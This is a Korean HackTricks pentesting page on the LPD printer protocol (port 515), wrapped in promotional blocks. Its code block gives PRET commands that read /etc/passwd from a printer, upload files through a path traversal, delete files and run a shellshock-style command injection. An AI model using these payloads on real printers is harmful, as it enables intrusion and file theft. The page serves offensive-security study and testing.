htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요! HackTricks를 지원하는 다른 방법: * **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요! * [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요. * [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다. * 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를** **팔로우**하세요. * **Hacking 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.
### **LPD 프로토콜 소개** 1980년대에는 **Line Printer Daemon (LPD) 프로토콜**이 Berkeley Unix에서 개발되었으며, 나중에 RFC1179를 통해 공식화되었습니다. 이 프로토콜은 515/tcp 포트를 통해 작동하며, `lpr` 명령을 통해 상호작용할 수 있습니다. LPD를 통한 인쇄의 핵심은 **제어 파일**(작업 세부 정보 및 사용자 지정)과 함께 **데이터 파일**(인쇄 정보를 보유)을 보내는 것입니다. 제어 파일을 통해 데이터 파일에 대한 **다양한 파일 형식**을 선택할 수 있지만, 이러한 파일의 처리는 특정 LPD 구현에 따라 결정됩니다. Unix와 유사한 시스템에서 널리 인정받는 구현체는 **LPRng**입니다. 특히, LPD 프로토콜은 악성 PostScript 또는 PJL 인쇄 작업을 실행하기 위해 악용될 수 있습니다. ### **LPD 프린터와 상호작용하기 위한 도구** [**PRET**](https://github.com/RUB-NDS/PRET)는 LPD 호환 프린터와 상호작용하기 위한 두 가지 필수 도구인 `lpdprint`와 `lpdtest`를 소개합니다. 이 도구들은 데이터를 인쇄하거나 프린터 상의 파일을 조작하는 다양한 작업을 가능하게 합니다. 파일의 다운로드, 업로드, 삭제 등이 가능합니다: ```python # To print a file to an LPD printer lpdprint.py hostname filename # To get a file from the printer lpdtest.py hostname get /etc/passwd # To upload a file to the printer lpdtest.py hostname put ../../etc/passwd # To remove a file from the printer lpdtest.py hostname rm /some/file/on/printer # To execute a command injection on the printer lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4' # To send a mail through the printer lpdtest.py hostname mail lpdtest@mailhost.local ``` 프린터 해킹을 더 탐구하고 싶은 개인들을 위한 포괄적인 자료는 [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page)에서 찾을 수 있습니다. # Shodan * `포트 515`
htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요! HackTricks를 지원하는 다른 방법: * **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요! * [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요. * 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family)인 [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. * 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를** **팔로우**하세요. * **HackTricks**와 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하여 여러분의 해킹 기법을 공유하세요.